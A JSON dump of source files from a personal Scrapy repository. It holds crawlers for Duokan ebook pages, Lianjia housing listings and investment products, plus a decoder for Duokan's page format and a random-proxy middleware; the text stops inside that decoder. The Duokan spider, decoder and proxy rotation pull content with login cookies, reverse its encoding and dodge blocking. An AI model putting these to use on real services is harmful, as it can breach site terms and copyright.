'data': book_info})\n for idx, page in enumerate(book_info['pages']):\n yield scrapy.Request('http://www.duokan.com/reader/page/%s/%s?trait=medium' % (book_info['book_id'], page['page_id']),\n cookies=self.cookie,\n callback=self.parse_page,\n meta={'book_id': book_info['book_id'], 'page_id': page['page_id'], 'page_num': idx},\n )\n\n def parse_page(self, response):\n req = response.request\n if response.status != 200:\n logger.warning('no page content, meta[%s]' % (req.meta))\n return\n page_info = simplejson.loads(dk.decode(response.body))\n if page_info.get('status') != 'ok':\n logger.warning('page_info is not ok[%s]' % (page_info))\n return\n if self.save_file:\n super().parse_page(response)\n return\n yield IssItem({\n 'book_id': req.meta['book_id'],\n 'page_id': req.meta['page_id'],\n 'page_num': req.meta['page_num'],\n 'url': page_info['url'],\n })\n yield scrapy.Request(page_info['url'],\n cookies=self.cookie,\n callback=self.save_page,\n meta=req.meta,\n dont_filter=True,\n )\n"
},
{
"alpha_fraction": 0.6255506873130798,
"alphanum_fraction": 0.6321585774421692,
"avg_line_length": 44.400001525878906,
"blob_id": "335ed4f9f2bc9868faadaab8fdd53ee633f6704f",
"content_id": "88442310015d4a088f7ccacef27f35f569e93445",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 454,
"license_type": "permissive",
"max_line_length": 165,
"num_lines": 10,
"path": "/house/lianjia/import_db.sh",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\ndir=${1:-bj}\ndir=${dir%/}\nfor i in ${dir}/[0-9]*.json; do\n echo \"$i\"\n while read -r line; do\n echo \"$line\" | jq --compact-output --raw-output '.data.list' | mongoimport -d lianjia -c \"$dir\" --jsonArray --mode=upsert --upsertFields=house_code\n done < \"$i\"\ndone\njq --compact-output --raw-output '.data' \"$dir\"/bizcircle_*.json | mongoimport -d lianjia -c \"${dir}_community\" --jsonArray --mode=upsert --upsertFields=community_id\n"
},
{
"alpha_fraction": 0.5040322542190552,
"alphanum_fraction": 0.5564516186714172,
"avg_line_length": 19.66666603088379,
"blob_id": "2e6e115bc822251fe50911bef67533e4ef1ff812",
"content_id": "4614f241346ff3b95caac9c3b7d4fba56aafb4d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 248,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 12,
"path": "/house/lianjia/run.sh",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\ncode=${1:-110000}\ndir=${2:-./}\nfor i in {1..100}; do\n echo \"$i\"\n rm -f \"bizcircle_${code}.json\"\n python get_all_house.py \"$code\" --output-dir \"$dir\" && break\n ret=$?\n echo \"return code is $ret\"\n sleep 1\ndone\nexit $ret\n"
},
{
"alpha_fraction": 0.5949770212173462,
"alphanum_fraction": 0.6034665703773499,
"avg_line_length": 32.654762268066406,
"blob_id": "298d501a471f8c8d052471e20f6187ed0d65d1c6",
"content_id": "cb19d0a0a747677f6401c3f649777befb4970abb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2827,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 84,
"path": "/house/lianjia/get_all_house.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport csv\nimport sys\nimport json\nimport os\nimport datetime\nimport urllib\nimport requests\nimport time\nimport argparse\nfrom tqdm import tqdm\n\n\nbizcircle_url = 'http://ajax.lianjia.com/ajax/mapsearch/area/bizcircle?city_id={code}'\ncircle_url = 'http://ajax.lianjia.com/ajax/housesell/area/bizcircle?ids={ids}&limit_offset={cursor}&limit_count={step}&sort=&&city_id={code}'\nck_file = 'checkpoint'\nSTEP_DELAY = 0.5 # seconds\nDELAY = 2 # seconds\n\n\ndef wget_lj(url, file=None, dir='./', append=False):\n ts = int(time.time() * 1000)\n url += '&_={ts}'.format(ts=ts)\n content = requests.get(url, timeout=15).content\n if file:\n mode = 'a' if append else 'w'\n with open(os.path.join(dir, file), mode) as f:\n f.write(content+'\\n')\n return content\n\n\ndef load_checkpoint(dir='./'):\n start_cir_id = 0\n start_i = 0\n try:\n with open(os.path.join(dir, ck_file), 'r') as f:\n start_cir_id = int(f.readline())\n except:\n pass\n return start_cir_id, start_i\n\n\ndef save_checkpoint(cir_id, dir='./'):\n with open(os.path.join(dir, ck_file), 'w') as f:\n f.writelines([str(cir_id)])\n\n\ndef main():\n step = 200\n parser = argparse.ArgumentParser()\n parser.add_argument('city_code', nargs='?', default=110000, type=int, help='city code')\n parser.add_argument('-o', '--output-dir', required=False, default='./', type=os.path.abspath, help='save directory')\n parser.add_argument('-d', '--debug', required=False, default=False, action='store_true')\n args = parser.parse_args()\n dir = args.output_dir\n if not os.path.exists(dir):\n os.mkdir(dir)\n city_code = args.city_code\n bizcircle = json.loads(wget_lj(bizcircle_url.format(code=city_code), file='bizcircle_%s.json' % (city_code), dir=dir), encoding='utf-8')\n start_cir_id, start_i = load_checkpoint(dir)\n start = (start_cir_id == 0)\n for cir in tqdm(bizcircle['data'], desc='bizcircle', disable=not args.debug):\n cir_id = cir['id']\n if not start:\n if cir_id == start_cir_id:\n start = True\n continue\n cir_name = cir['name']\n cir_cnt = cir['house_count']\n cir_ids = [str(cir_id)]\n circle_list = []\n file = '%s_%s.json' % (cir_id, cir_name)\n desc = 'circle detail [%s:%s]' % (cir_name, cir_id)\n for i in tqdm(range(0, cir_cnt, step), desc=desc, disable=not args.debug):\n url = circle_url.format(ids=urllib.quote(','.join(cir_ids)), cursor=i, step=step, code=city_code)\n house_list = json.loads(wget_lj(url, file=file, dir=dir, append=True))['data']['list']\n circle_list.extend(house_list)\n time.sleep(STEP_DELAY)\n time.sleep(DELAY)\n save_checkpoint(cir_id, dir)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.8181818127632141,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 21,
"blob_id": "122383da1d2dc77591cb6e60373e39e3ff555e28",
"content_id": "869b312fbd40e892046ad79aea51bb14adb537f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 25,
"num_lines": 2,
"path": "/README.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# scrapy_projects\nMy scrapy project scripts\n"
},
{
"alpha_fraction": 0.3617810904979706,
"alphanum_fraction": 0.37105751037597656,
"avg_line_length": 30.647058486938477,
"blob_id": "e51bab7f57c5565b8af12301008d400b83ebf5a0",
"content_id": "7cefd9ff23486968711bef25d72371be74b0c1ba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 539,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 17,
"path": "/caoporn/caoporn/mongo_func.js",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "db.system.js.save({\n _id: \"convert\",\n value: function () {\n db.video.find({'$or': [{'length': {'$type': 2}}, {'views': {'$type': 2}}]}).forEach(\n function(doc){\n length=0;\n sp=doc.length.split(':');\n for (i in sp){\n length=length*60+parseInt(sp[i]);\n }\n db.video.update({'_id': doc._id},\n {'$set': {'views': parseInt(doc.views), 'length': length}}\n );\n }\n );\n }\n})\n\n"
},
{
"alpha_fraction": 0.6003937125205994,
"alphanum_fraction": 0.6043307185173035,
"avg_line_length": 35.261905670166016,
"blob_id": "72f4e6480cffc718f42989a389d1836c9a57a16e",
"content_id": "c5c4174bad32317c640f194a32e6ab5d1228c7fb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1524,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 42,
"path": "/house/lianjia/find_change.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport pymongo\nimport argparse\nimport datetime\nimport scrapy\nimport pprint\nfrom settings import MONGO_DB, MONGO_URI\n\n\ndef _date(s):\n return datetime.datetime.strptime(s, '%Y%m%d').date()\n\ndef main():\n today = datetime.date.today()\n yesterday = today - datetime.timedelta(days=1)\n parser = argparse.ArgumentParser()\n parser.add_argument('-b', '--begin_date', required=False,\n default=yesterday.strftime('%Y%m%d'), type=_date, help='the house whose day need be compared')\n parser.add_argument('-e', '--end_date', required=False,\n default=None, type=_date, help='the house whose day need be compared')\n parser.add_argument('-d', '--dir', required=False, default='both', choices=['both', 'gt', 'lt'])\n args = parser.parse_args()\n begin_date = args.begin_date\n end_date = args.end_date or begin_date + datetime.timedelta(days=1)\n\n mongo_uri = MONGO_URI\n mongo_db = MONGO_DB\n client = pymongo.MongoClient(mongo_uri)\n db = client[mongo_db]\n tbl_name = 'bj%s' % end_date.strftime('%Y%m%d')\n cond = [{'house_price_history.0.time': {'$gte': '%s' % begin_date, '$lt': '%s' % end_date}},]\n if args.dir != 'both':\n cond.append(\n {'house_price_history.0.old_price': {'$%s' % args.dir: 'house_price_history.0.new_price'}}\n )\n q = db[tbl_name].find({'$and': cond})\n print q.count()\n # for house in q.find({'$and': cond}):\n # pprint.pprint(house)\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.5990272760391235,
"alphanum_fraction": 0.6109159588813782,
"avg_line_length": 30.36440658569336,
"blob_id": "16fffa76f4df1ee471b0e79ce55b648f60b79c29",
"content_id": "00243fe6d68aff4058cb40880bb748935ebe5e20",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3709,
"license_type": "permissive",
"max_line_length": 142,
"num_lines": 118,
"path": "/small/xiaoying/notice_dag.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom StringIO import StringIO\nfrom os import path, environ\nfrom airflow import DAG\nfrom airflow.operators import BashOperator, BranchPythonOperator, PythonOperator, SlackAPIPostOperator\nfrom utils import period2timedelta, money2float\nfrom filter import Filter\nimport datetime\nimport pandas as pd\n\n\ndef need_run(ti, execution_date, **kwargs):\n long_time = datetime.timedelta(seconds=60*10)\n if ti.start_date and execution_date and ti.start_date - execution_date < long_time:\n return 'run_spider'\n return ''\nslack_message_key = 'slack_message'\ncsv_file = 'xy.csv'\ndir = path.abspath(path.dirname(__file__))\ndef filter_data(csv_file, start_day=28, end_day=90, interest=780, state=None, **kwargs):\n f = pd.read_csv(csv_file)\n f['sub_title'] = f['sub_title'].fillna('')\n candidate = []\n filter = Filter()\n filter.install_rule(lambda v: v['period'] <= datetime.timedelta(days=20) and v['benefit'] > 6, ok_stop=True, weight=5)\n filter.install_rule(lambda v: v['benefit'] >= 8 and v['period'] < datetime.timedelta(days=230))\n filter.install_rule(lambda v: not v['sub_title'].startswith('新手专享'))\n for row in f.iterrows():\n idx, v = row\n money = money2float(v['money'])\n period = period2timedelta(v['period'])\n # remove percent sign(%)\n benefit = float(v['expected_benefit'][:-1])\n item = {\n 'title': v['title'],\n 'sub_title': v['sub_title'],\n 'money': money,\n 'period': period,\n 'benefit': benefit,\n }\n if filter.check(item):\n candidate.append(item)\n return candidate\n\n\ndef need_slack(ti, **kwargs):\n candidate = ti.xcom_pull(key=None, task_ids='filter_data')\n if candidate and len(candidate) > 0:\n s = StringIO()\n for can in candidate:\n s.write('%s(%s) money: %s period: %s days benefit: %s%%\\n' % (\n can['title'],\n can['sub_title'],\n can['money'],\n can['period'].days,\n can['benefit'],\n ))\n ti.xcom_push(slack_message_key, s.getvalue().decode('utf-8'))\n return 'post_slack'\n return ''\n\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.datetime(2017, 1, 5),\n 'email': ['[email protected]', ],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 3,\n 'retry_delay': datetime.timedelta(minutes=5),\n 'queue': 'bash_queue',\n 'provide_context': True,\n 'retry_exponential_backoff': True,\n # 'end_date': datetime.datetime(2017, 1, 1),\n}\n\ndag = DAG('xiaoying', default_args=default_args, schedule_interval='* 8-22 * * *')\n\n\nonly_run_now = BranchPythonOperator(\n task_id='only_run_now',\n python_callable=need_run,\n dag=dag\n)\nrun_spider = BashOperator(\n task_id='run_spider',\n bash_command='cd {dir} && rm -f {csv_file} && scrapy runspider spiders/invest.py -t csv -o {csv_file}'.format(dir=dir, csv_file=csv_file),\n dag=dag\n)\n\nfilter_data = PythonOperator(\n task_id='filter_data',\n python_callable=filter_data,\n op_args=(csv_file, ),\n dag=dag\n)\n\nneed_slack = BranchPythonOperator(\n task_id='need_slack',\n python_callable=need_slack,\n dag=dag\n)\n\nslack_token = environ.get('SLACK_TOKEN')\ntxt = '''{{ task_instance.xcom_pull(task_ids='need_slack', key='%s') }}''' % (slack_message_key)\nif txt is None:\n txt = 'Nothing to read'\npost_slack = SlackAPIPostOperator(\n task_id='post_slack',\n token=slack_token,\n channel='#xiaoying',\n username='airflow',\n text='{{ execution_date }}\\n' + txt,\n dag=dag\n)\n\nonly_run_now >> run_spider >> filter_data >> need_slack >> post_slack\n"
},
{
"alpha_fraction": 0.663690447807312,
"alphanum_fraction": 0.6815476417541504,
"avg_line_length": 29.545454025268555,
"blob_id": "529db666c4d2325cf69b047340ba710b6e9d07a5",
"content_id": "3556b7d1774b552fd4cb050c919adb25908b08d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 336,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 11,
"path": "/house/lianjia/readme.md",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "```shell\npip install -r requirements.txt\nbrew install jq mongodb\n```\n```python\npython get_all_house.py [110000] --output-dir bj$(date '+%Y%m%d')\n./import_db.sh bj$(date '+%Y%m%d')\n```\nIf you want to restart your scrapy you may need `rm bj$(date '+%Y%m%d')/checkpoint`.\n\nIf you need add some filter conditions you can refer `load_bj.sh`\n"
},
{
"alpha_fraction": 0.525612473487854,
"alphanum_fraction": 0.5334075689315796,
"avg_line_length": 22.63157844543457,
"blob_id": "619222f52647ba4f0e41448ddde5dd13a9eba689",
"content_id": "c5e599520564074ad573c6fa2deaa70e3c92b1ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 898,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 38,
"path": "/small/xiaoying/filter.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\n\nclass Rule(object):\n\n \"\"\"Filter fule\"\"\"\n\n def __init__(self, func, ok_stop=False, weight=10):\n \"\"\"\n\n :func: filter function\n :ok_stop: if ok stop process later rule\n :weight: weight, smaller will go first\n\n \"\"\"\n self.func = func\n self.ok_stop = ok_stop\n self.weight = weight\n\nclass Filter(object):\n\n \"\"\"Filter good invest.\"\"\"\n last_weight = 10\n\n def __init__(self):\n self._rules = []\n\n def install_rule(self, func, ok_stop=False, weight=last_weight+1):\n self._rules.append(Rule(func, ok_stop, weight))\n self.last_weight = weight + 1\n\n def check(self, item):\n for f in sorted(self._rules, key=lambda r: r.weight):\n ok = f.func(item)\n if f.ok_stop and ok:\n return True\n if not ok:\n return False\n return True\n"
},
{
"alpha_fraction": 0.5676156878471375,
"alphanum_fraction": 0.5782918334007263,
"avg_line_length": 22.41666603088379,
"blob_id": "1c72a010396db8d197ce92d6cc2e8b22fe6d9370",
"content_id": "42de957998f2fa13c495e62f45cf429d209054a1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 562,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 24,
"path": "/duokan/duokan/decode.js",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "var process = require('process');\nvar fs = require('fs');\nvar dk = require(\"./dkbson\");\nif (process.argv.length <= 1){\n console.log(\"Usage: node \"+process.argv[1]+\" bson_file\");\n process.exit(1);\n}\nvar decode_bson = function(str){\n res = dk.dkbson.decode(str.trim());\n if (res.status == 'error'){\n console.log(res);\n process.exit(2);\n }\n console.log(\"%j\", res);\n};\n\nfile_name = process.argv[2];\n\nfs.readFile(file_name, 'utf8', function(err, data) {\n if (err) {\n return console.log(err);\n }\n decode_bson(data);\n});\n"
},
{
"alpha_fraction": 0.6278026700019836,
"alphanum_fraction": 0.6295964121818542,
"avg_line_length": 33.84375,
"blob_id": "132097cffa711f38e8eb1acd7458897c11597c81",
"content_id": "e3b9c54d6678c2dac56f1528343f847d22f69dab",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1115,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 32,
"path": "/proxy/proxy/downloadermiddlewares/proxy.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport logging\nimport random\nfrom scrapy.http import Request\nfrom scrapy.downloadermiddlewares.httpproxy import HttpProxyMiddleware\nfrom db import RedisPool\n\n\nclass ProxyMiddleware(HttpProxyMiddleware):\n \"\"\"use random proxy\"\"\"\n proxy_list = []\n\n @classmethod\n def from_crawler(cls, crawler):\n \"\"\"connect redis\n \"\"\"\n redis_host = crawler.settings.get('REDIS_HOST')\n redis_port = crawler.settings.get('REDIS_PORT')\n redis_db = crawler.settings.get('REDIS_DB')\n normal_s = crawler.settings.get('NORMAL_S')\n conn = RedisPool.get_pool(redis_host, redis_port, redis_db)\n cls.proxy_list = list(conn.smembers(normal_s))\n return cls()\n\n def process_request(self, request, spider):\n \"\"\"record this page\n \"\"\"\n if 'next_use_proxy' in request.meta and self.proxy_list and len(self.proxy_list) > 0:\n proxy = random.choice(self.proxy_list)\n request.meta['proxy'] = 'http://%s' % (proxy)\n logging.debug('use proxy %s' % (proxy))\n request.meta['next_use_proxy'] = True\n"
},
{
"alpha_fraction": 0.37135255336761475,
"alphanum_fraction": 0.4121705889701843,
"avg_line_length": 43.06227111816406,
"blob_id": "366501961c9404a471714ec41a8c168d2f2ce818",
"content_id": "16ce3d88e51ab7a0357fc5126af38278ac87a306",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12029,
"license_type": "permissive",
"max_line_length": 397,
"num_lines": 273,
"path": "/duokan/duokan/dkbson.js",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "BinaryParser = function(t, e) {\n this.bigEndian = t;\n this.allowExceptions = e;\n};\np = BinaryParser.prototype;\nwith (p.encodeFloat = function(t, e, i) {\n var n, o, s, a, l, c = Math.pow(2, i - 1) - 1, u = -c + 1, h = c, d = u - e, f = isNaN(v = parseFloat(t)) || v == -1 / 0 || v == +1 / 0 ? v : 0, p = 0, g = 2 * c + 1 + e + 3, _ = Array(g), m = 0 > (v = 0 !== f ? 0 : v), v = Math.abs(v), y = Math.floor(v), b = v - y;\n for (n = g; n; _[--n] = 0)\n ;\n for (n = c + 2; y && n; _[--n] = y % 2, y = Math.floor(y / 2))\n ;\n for (n = c + 1; b > 0 && n; (_[++n] = ((b *= 2) >= 1) - 0) && --b)\n ;\n for (n = -1; g > ++n && !_[n]; )\n ;\n if (_[(o = e - 1 + (n = (p = c + 1 - n) >= u && h >= p ? n + 1 : c + 1 - (p = u - 1))) + 1]) {\n if (!(s = _[o]))\n for (a = o + 2; !s && g > a; s = _[a++])\n ;\n for (a = o + 1; s && --a >= 0; (_[a] = !_[a] - 0) && (s = 0))\n ;\n }\n for (n = 0 > n - 2 ? -1 : n - 3; g > ++n && !_[n]; )\n ;\n for ((p = c + 1 - n) >= u && h >= p ? ++n : u > p && (p != c + 1 - g && d > p && this.warn(\"encodeFloat::float underflow\"), n = c + 1 - (p = u - 1)), (y || 0 !== f) && (this.warn(y ? \"encodeFloat::float overflow\" : \"encodeFloat::\" + f), p = h + 1, n = c + 2, f == -1 / 0 ? m = 1 : isNaN(f) && (_[n] = 1)), v = Math.abs(p + c), a = i + 1, l = \"\"; --a; l = v % 2 + l, v = v >>= 1)\n ;\n for (v = 0, a = 0, n = (l = (m ? \"1\" : \"0\") + l + _.slice(n, n + e).join(\"\")).length, r = []; n; v += (1 << a) * l.charAt(--n), 7 == a && (r[r.length] = String.fromCharCode(v), v = 0), a = (a + 1) % 8)\n ;\n return r[r.length] = v ? String.fromCharCode(v) : \"\", (this.bigEndian ? r.reverse() : r).join(\"\");\n}, p.encodeInt = function(t, e) {\n var i = Math.pow(2, e), n = [];\n for ((t >= i || -(i >> 1) > t) && this.warn(\"encodeInt::overflow\") && (t = 0), 0 > t && (t += i); t; n[n.length] = String.fromCharCode(t % 256), t = Math.floor(t / 256))\n ;\n for (e = -(-e >> 3) - n.length; e--; n[n.length] = \"\\0\")\n ;\n return (this.bigEndian ? n.reverse() : n).join(\"\");\n}, p.decodeFloat = function(t, e, i) {\n var n, r, o, s = ((s = new this.Buffer(this.bigEndian, t)).checkBuffer(e + i + 1), s), a = Math.pow(2, i - 1) - 1, l = s.readBits(e + i, 1), c = s.readBits(e, i), u = 0, h = 2, d = s.buffer.length + (-e >> 3) - 1;\n do{\n for (n = s.buffer[++d], r = e % 8 || 8, o = 1 << r; o >>= 1; n & o && (u += 1 / h), h *= 2)\n ;\n e -= r;\n }while (e);\n return c == (a << 1) + 1 ? u ? 0 / 0 : l ? -1 / 0 : +1 / 0 : (1 + -2 * l) * (c || u ? c ? Math.pow(2, c - a) * (1 + u) : Math.pow(2, -a + 1) * u : 0);\n}, p.decodeInt = function(t, e, i) {\n var n = new this.Buffer(this.bigEndian, t), r = n.readBits(0, e), o = Math.pow(2, e);\n return i && r >= o / 2 ? r - o : r;\n}, {p: (p.Buffer = function(t, e) {\n this.bigEndian = t || 0, this.buffer = [], this.setBuffer(e);\n }).prototype})\n p.readBits = function(t, e) {\n function i(t, e) {\n for (++e; --e; t = 1073741824 == (1073741824 & (t %= 2147483648)) ? 2 * t : 2 * (t - 1073741824) + 2147483647 + 1)\n ;\n return t;\n }\n if (0 > t || 0 >= e)\n return 0;\n this.checkBuffer(t + e);\n for (var n, r = t % 8, o = this.buffer.length - (t >> 3) - 1, s = this.buffer.length + (-(t + e) >> 3), a = o - s, l = (this.buffer[o] >> r & (1 << (a ? 8 - r : e)) - 1) + (a && (n = (t + e) % 8) ? (this.buffer[s++] & (1 << n) - 1) << (a-- << 3) - r : 0); a; l += i(this.buffer[s++], (a-- << 3) - r))\n ;\n return l;\n }, p.setBuffer = function(t) {\n if (t) {\n for (var e, i = e = t.length, n = this.buffer = Array(e); i; n[e - i] = t.charCodeAt(--i))\n ;\n this.bigEndian && n.reverse();\n }\n }, p.hasNeededBits = function(t) {\n return this.buffer.length >= -(-t >> 3);\n }, p.checkBuffer = function(t) {\n if (!this.hasNeededBits(t))\n throw Error(\"checkBuffer::missing bytes\");\n };\np.warn = function(t) {\n if (this.allowExceptions)\n throw Error(t);\n return 1;\n}, p.toSmall = function(t) {\n return this.decodeInt(t, 8, !0);\n}, p.fromSmall = function(t) {\n return this.encodeInt(t, 8, !0);\n}, p.toByte = function(t) {\n return this.decodeInt(t, 8, !1);\n}, p.fromByte = function(t) {\n return this.encodeInt(t, 8, !1);\n}, p.toShort = function(t) {\n return this.decodeInt(t, 16, !0);\n}, p.fromShort = function(t) {\n return this.encodeInt(t, 16, !0);\n}, p.toWord = function(t) {\n return this.decodeInt(t, 16, !1);\n}, p.fromWord = function(t) {\n return this.encodeInt(t, 16, !1);\n}, p.toInt = function(t) {\n return this.decodeInt(t, 32, !0);\n}, p.fromInt = function(t) {\n return this.encodeInt(t, 32, !0);\n}, p.toDWord = function(t) {\n return this.decodeInt(t, 32, !1);\n}, p.fromDWord = function(t) {\n return this.encodeInt(t, 32, !1);\n}, p.toFloat = function(t) {\n return this.decodeFloat(t, 23, 8);\n}, p.fromFloat = function(t) {\n return this.encodeFloat(t, 23, 8);\n}, p.toDouble = function(t) {\n return this.decodeFloat(t, 52, 11);\n}, p.fromDouble = function(t) {\n return this.encodeFloat(t, 52, 11);\n};\nbase64 = function() {\n function t(t, e) {\n var i = o.indexOf(t.charAt(e));\n if (-1 === i)\n throw \"Cannot decode base64\";\n return i;\n }\n function e(e) {\n var i, n, o = 0, s = e.length, a = [];\n if (e += \"\", 0 === s)\n return e;\n if (0 !== s % 4)\n throw \"Cannot decode base64\";\n for (e.charAt(s - 1) === r && (o = 1, e.charAt(s - 2) === r && (o = 2), s -= 4), i = 0; s > i; i += 4)\n n = t(e, i) << 18 | t(e, i + 1) << 12 | t(e, i + 2) << 6 | t(e, i + 3), a.push(String.fromCharCode(n >> 16, 255 & n >> 8, 255 & n));\n switch (o) {\n case 1:\n n = t(e, i) << 18 | t(e, i + 1) << 12 | t(e, i + 2) << 6, a.push(String.fromCharCode(n >> 16, 255 & n >> 8));\n break;\n case 2:\n n = t(e, i) << 18 | t(e, i + 1) << 12, a.push(String.fromCharCode(n >> 16));\n }\n return a.join(\"\");\n }\n function i(t, e) {\n var i = t.charCodeAt(e);\n if (i > 255)\n throw \"INVALID_CHARACTER_ERR: DOM Exception 5\";\n return i;\n }\n function n(t) {\n if (1 !== arguments.length)\n throw \"SyntaxError: exactly one argument required\";\n t += \"\";\n var e, n, s = [], a = t.length - t.length % 3;\n if (0 === t.length)\n return t;\n for (e = 0; a > e; e += 3)\n n = i(t, e) << 16 | i(t, e + 1) << 8 | i(t, e + 2), s.push(o.charAt(n >> 18)), s.push(o.charAt(63 & n >> 12)), s.push(o.charAt(63 & n >> 6)), s.push(o.charAt(63 & n));\n switch (t.length - a) {\n case 1:\n n = i(t, e) << 16, s.push(o.charAt(n >> 18) + o.charAt(63 & n >> 12) + r + r);\n break;\n case 2:\n n = i(t, e) << 16 | i(t, e + 1) << 8, s.push(o.charAt(n >> 18) + o.charAt(63 & n >> 12) + o.charAt(63 & n >> 6) + r);\n }\n return s.join(\"\");\n }\n var r = \"=\", o = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\", s = \"1.0\";\n return {decode: e,encode: n,VERSION: s};\n }();\n\ndkbson = function() {\n function t(t) {\n return decodeURIComponent(escape(t));\n }\n function e(t, e) {\n for (var i = 1, n = t.charCodeAt(e), r = n, o = 128; 4 >= i && 0 != (o & n); )\n o >>= 1, i++, r = (r << 1) % 256;\n for (var s = 0; i - 1 > s; s++)\n r >>= 1;\n var a = r;\n for (s = 1; i > s; s++)\n a = (a << 8) + t.charCodeAt(e + s);\n return [e + i, a];\n }\n function i(i, n, r) {\n var o, s = new BinaryParser();\n if (i == l.TYPE_INT8)\n o = s.toSmall(n.substr(r, 1)), r++;\n else if (i == l.TYPE_INT16)\n o = s.toShort(n.substr(r, 2)), r += 2;\n else if (i == l.TYPE_INT32)\n o = s.toInt(n.substr(r, 4)), r += 4;\n else if (i == l.TYPE_INT64)\n o = s.decodeInt(n.substr(r, 8), 64, !0), r += 8;\n else if (i == l.TYPE_DOUBLE)\n o = s.toDouble(n.substr(r, 8)), r += 8;\n else if (i == l.TYPE_FLOAT){\n o = s.toFloat(n.substr(r, 4)), r += 4;\n }\n else if (i == l.TYPE_STRING) {\n var a = e(n, r);\n r = a[0];\n var c = a[1];\n o = n.substr(r, c), o = t(o), r += c;\n } else\n i == l.TYPE_NULL ? (o = null, r++) : i == l.TYPE_BOOL ? (o = 0 === n.charCodeAt(r) ? !1 : !0, r++) : i == l.TYPE_REAL16 ? (o = s.toShort(n.substr(r, 2)), o /= 100, r += 2) : i == l.TYPE_REAL24 ? (o = s.toInt(n.substr(r, 3) + \"\\0\"), o /= 1e3, r += 3) : i == l.TYPE_REAL32 ? (o = s.toInt(n.substr(r, 4)), o /= 1e4, r += 4) : console.log(\"error: unsupported type:\" + i.charCodeAt(0));\n return [r, o];\n }\n function n(t, o) {\n var s = [], a = e(t, o);\n o = a[0];\n for (var c = a[1], u = c; u-- > 0; ) {\n var h, d, f = t.charCodeAt(o), p = o + 1;\n f == l.TYPE_OBJECT ? (h = r(t, p), o = h[0], d = h[1]) : f == l.TYPE_ARRAY ? (h = n(t, p), o = h[0], d = h[1]) : (h = i(f, t, p), o = h[0], d = h[1]), s.push(d);\n }\n return [o, s];\n }\n function r(t, o) {\n var s = e(t, o);\n o = s[0];\n for (var a = s[1], c = {}, u = a; u-- > 0; ) {\n var h, d = t.charCodeAt(o), f = \"\", p = \"\";\n for (h = o + 1; \"\\0\" != t.charAt(h); h++)\n f += t.charAt(h);\n h++;\n var g;\n d == l.TYPE_OBJECT ? (g = r(t, h), o = g[0], p = g[1]) : d == l.TYPE_ARRAY ? (g = n(t, h), o = g[0], p = g[1]) : (g = i(d, t, h), o = g[0], p = g[1]), c[f] = p\n }\n return [o, c];\n }\n var a = base64, l = {TYPE_INT8: 1,TYPE_INT16: 2,TYPE_INT32: 3,TYPE_INT64: 4,TYPE_FLOAT: 16,TYPE_DOUBLE: 17,TYPE_REAL16: 18,TYPE_REAL24: 19,TYPE_REAL32: 20,TYPE_STRING: 32,TYPE_BOOL: 48,TYPE_NULL: 49,TYPE_OBJECT: 64,TYPE_ARRAY: 65};\n return {decode: function(t) {\n var e = a.decode(t), i = r(e, 0);\n return i[1];\n }};\n }();\n\nexports.dkbson = dkbson;\n\nvar request = require('request');\nvar sleep = require('sleep');\n// DO NOT ADD console.log, use console.error instead or it will make other program confused\nvar req = function(options_or_url, end_cb){\n var MAX_RETRY = 10;\n var TIMEOUT_MS = 3000;\n var SLEEP_MS = 500;\n if ('string' == 